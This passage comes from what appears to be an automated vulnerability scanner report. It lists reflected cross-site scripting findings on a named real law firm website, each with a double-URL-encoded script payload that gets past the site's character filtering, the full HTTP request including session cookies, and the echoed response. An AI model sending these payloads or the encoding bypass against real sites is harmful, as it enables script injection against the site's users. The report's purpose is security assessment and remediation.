User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=18263798;expires=Fri, 11-Jan-2041 15:10:49 GMT;path=/
Set-Cookie: CFTOKEN=29109429;expires=Fri, 11-Jan-2041 15:10:49 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="85981"><script>alert(1)</script>038dfd0999c" value="1">
...[SNIP]...

2.51. http://www.wileyrein.com/css/_blog.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_blog.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 490d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3a95841ba2 was submitted in the REST URL parameter 1. This input was echoed as 490d8"><script>alert(1)</script>a3a95841ba2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css490d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3a95841ba2/_blog.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css490d8"><script>alert(1)</script>a3a95841ba2/_blog.css" value="">
...[SNIP]...

2.52. http://www.wileyrein.com/css/_blog.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_blog.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c8c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84fbe621327 was submitted in the REST URL parameter 2. This input was echoed as 1c8c9"><script>alert(1)</script>84fbe621327 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_blog.css1c8c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84fbe621327 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_blog.css1c8c9"><script>alert(1)</script>84fbe621327" value="">
...[SNIP]...

2.53. http://www.wileyrein.com/css/_list.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_list.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86d6e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6da1f2345d was submitted in the REST URL parameter 1. This input was echoed as 86d6e"><script>alert(1)</script>a6da1f2345d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css86d6e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6da1f2345d/_list.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css86d6e"><script>alert(1)</script>a6da1f2345d/_list.css" value="">
...[SNIP]...

2.54. http://www.wileyrein.com/css/_list.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_list.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d81ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda2c05f8831 was submitted in the REST URL parameter 2. This input was echoed as d81ed"><script>alert(1)</script>da2c05f8831 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_list.cssd81ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda2c05f8831 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_list.cssd81ed"><script>alert(1)</script>da2c05f8831" value="">
...[SNIP]...

2.55. http://www.wileyrein.com/css/_main.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_main.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdd5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e672638c3b was submitted in the REST URL parameter 1. This input was echoed as bdd5f"><script>alert(1)</script>672638c3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cssbdd5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e672638c3b/_main.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/cssbdd5f"><script>alert(1)</script>672638c3b/_main.css" value="">
...[SNIP]...

2.56. http://www.wileyrein.com/css/_main.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_main.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1b51%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e450c96039aa was submitted in the REST URL parameter 2. This input was echoed as f1b51"><script>alert(1)</script>450c96039aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_main.cssf1b51%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e450c96039aa HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_main.cssf1b51"><script>alert(1)</script>450c96039aa" value="">
...[SNIP]...

2.57. http://www.wileyrein.com/css/_navMenu.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_navMenu.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de5e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e848b9694317 was submitted in the REST URL parameter 1. This input was echoed as de5e6"><script>alert(1)</script>848b9694317 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cssde5e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e848b9694317/_navMenu.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/cssde5e6"><script>alert(1)</script>848b9694317/_navMenu.css" value="">
...[SNIP]...

2.58. http://www.wileyrein.com/css/_navMenu.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_navMenu.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95db9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaee734d6695 was submitted in the REST URL parameter 2. This input was echoed as 95db9"><script>alert(1)</script>aee734d6695 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_navMenu.css95db9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaee734d6695 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_navMenu.css95db9"><script>alert(1)</script>aee734d6695" value="">
...[SNIP]...

2.59. http://www.wileyrein.com/css/_navSearch.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_navSearch.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25b68%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5762ef40df was submitted in the REST URL parameter 1. This input was echoed as 25b68"><script>alert(1)</script>c5762ef40df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css25b68%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5762ef40df/_navSearch.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css25b68"><script>alert(1)</script>c5762ef40df/_navSearch.css" value="">
...[SNIP]...

2.60. http://www.wileyrein.com/css/_navSearch.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_navSearch.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd77a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a210746c61 was submitted in the REST URL parameter 2. This input was echoed as fd77a"><script>alert(1)</script>0a210746c61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_navSearch.cssfd77a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a210746c61 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_navSearch.cssfd77a"><script>alert(1)</script>0a210746c61" value="">
...[SNIP]...

2.61. http://www.wileyrein.com/css/_slide.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_slide.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17ef6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4bcf499c51 was submitted in the REST URL parameter 1. This input was echoed as 17ef6"><script>alert(1)</script>b4bcf499c51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css17ef6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4bcf499c51/_slide.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css17ef6"><script>alert(1)</script>b4bcf499c51/_slide.css" value="">
...[SNIP]...

2.62. http://www.wileyrein.com/css/_slide.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_slide.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfc8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf9115355d was submitted in the REST URL parameter 2. This input was echoed as dfc8a"><script>alert(1)</script>df9115355d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_slide.cssdfc8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf9115355d HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_slide.cssdfc8a"><script>alert(1)</script>df9115355d" value="">
...[SNIP]...

2.63. http://www.wileyrein.com/css/main.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51eff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e085a170e769 was submitted in the REST URL parameter 1. This input was echoed as 51eff"><script>alert(1)</script>085a170e769 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css51eff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e085a170e769/main.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css51eff"><script>alert(1)</script>085a170e769/main.css" value="">
...[SNIP]...

2.64. http://www.wileyrein.com/css/main.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb5e2c8ed40b was submitted in the REST URL parameter 2. This input was echoed as 78b32"><script>alert(1)</script>b5e2c8ed40b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/main.css78b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb5e2c8ed40b HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/main.css78b32"><script>alert(1)</script>b5e2c8ed40b" value="">
...[SNIP]...

2.65. http://www.wileyrein.com/css/ui/ui.accordion.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.accordion.css

Issue detail

